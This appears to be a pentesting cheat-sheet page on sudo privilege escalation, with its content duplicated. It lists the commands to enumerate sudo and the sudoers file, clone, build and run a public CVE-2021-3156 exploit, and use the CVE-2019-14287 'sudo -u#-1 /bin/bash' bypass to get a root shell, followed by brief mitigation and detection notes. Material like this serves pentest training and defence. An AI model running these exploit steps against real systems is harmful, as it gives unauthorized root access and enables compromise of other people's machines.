22.Sudo

sudo -V | head -n1

sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

cat /etc/lsb-release # or cat /etc/os-release

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

Compile exploit

make

./sudo-hax-me-a-sandwich <target_id>

id
whoami

sudo -l

cat /etc/passwd | grep <username>

sudo -u#-1 id
sudo -u#-1 /bin/bash # or /bin/sh

id
whoami

1. CVE-2021-3156 (Heap-Based Buffer Overflow):

Vulnerability:
- Heap-based buffer overflow in sudo.
- Affected versions: 1.8.31 (Ubuntu 20.04), 1.8.27 (Debian 10), 1.9.2 (Fedora 33), and others.
Exploitation:
- Requires a Proof-of-Concept (PoC) exploit.
- Compile and run the exploit.
- Select the appropriate target (OS version).
Mitigation:
- Update sudo to a patched version.
Commands:
- sudo -V (check sudo version)
- git clone https://github.com/blasty/CVE-2021-3156.git
- make
- ./sudo-hax-me-a-sandwich <target_id>
- cat /etc/lsb-release (check OS version)

2. CVE-2019-14287 (Sudo Policy Bypass):

Vulnerability:
- Allows bypassing sudo policy restrictions.
- Affected sudo versions below 1.8.28.
- Requires the user to be allowed to run a specific command via sudo.
Exploitation:
- Use sudo -u#-1 <command> to run a command as root.
- -u#-1 is interpreted as -u0 (root).
Mitigation:
- Update sudo to a patched version.
Commands:
- sudo -l (check sudo privileges)
- cat /etc/passwd | grep <username> (check user ID)
- sudo -u#-1 id

Important Considerations and Enhancements:

Vulnerability Severity:
- Both vulnerabilities are critical.
- They allow unprivileged users to gain root access.
Patching:
- Keeping sudo updated is essential.
Sudo Configuration:
- Properly configuring /etc/sudoers is crucial.
Exploit Reliability:
- PoC exploits may require adjustments for specific systems.
Detection:
- Monitor sudo logs for suspicious activity.
- Use intrusion detection systems.
Real world examples: Researching real world sudo exploits will help solidify understanding of the attack vectors.
Sudoers file: more detail could be given about the syntax of the sudoers file.
Nopasswd: More detail could be given about the security implications of the NOPASSWD flag in the sudoers file.

Last updated 12 days ago

sudo -V | head -n1

sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

cat /etc/lsb-release # or cat /etc/os-release

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

make

./sudo-hax-me-a-sandwich <target_id>

id
whoami

sudo -l

cat /etc/passwd | grep <username>

sudo -u#-1 id
sudo -u#-1 /bin/bash # or /bin/sh

id
whoami

1. CVE-2021-3156 (Heap-Based Buffer Overflow):

Vulnerability:
- Heap-based buffer overflow in sudo.
- Affected versions: 1.8.31 (Ubuntu 20.04), 1.8.27 (Debian 10), 1.9.2 (Fedora 33), and others.
Exploitation:
- Requires a Proof-of-Concept (PoC) exploit.
- Compile and run the exploit.
- Select the appropriate target (OS version).
Mitigation:
- Update sudo to a patched version.
Commands:
- sudo -V (check sudo version)
- git clone https://github.com/blasty/CVE-2021-3156.git
- make
- ./sudo-hax-me-a-sandwich <target_id>
- cat /etc/lsb-release (check OS version)

2. CVE-2019-14287 (Sudo Policy Bypass):

Vulnerability:
- Allows bypassing sudo policy restrictions.
- Affected sudo versions below 1.8.28.
- Requires the user to be allowed to run a specific command via sudo.
Exploitation:
- Use sudo -u#-1 <command> to run a command as root.
- -u#-1 is interpreted as -u0 (root).
Mitigation:
- Update sudo to a patched version.
Commands:
- sudo -l (check sudo privileges)
- cat /etc/passwd | grep <username> (check user ID)
- sudo -u#-1 id

Important Considerations and Enhancements:

Vulnerability Severity:
- Both vulnerabilities are critical.
- They allow unprivileged users to gain root access.
Patching:
- Keeping sudo updated is essential.
Sudo Configuration:
- Properly configuring /etc/sudoers is crucial.
Exploit Reliability:
- PoC exploits may require adjustments for specific systems.
Detection:
- Monitor sudo logs for suspicious activity.
- Use intrusion detection systems.
Real world examples: Researching real world sudo exploits will help solidify understanding of the attack vectors.
Sudoers file: more detail could be given about the syntax of the sudoers file.
Nopasswd: More detail could be given about the security implications of the NOPASSWD flag in the sudoers file.

Last updated 12 days ago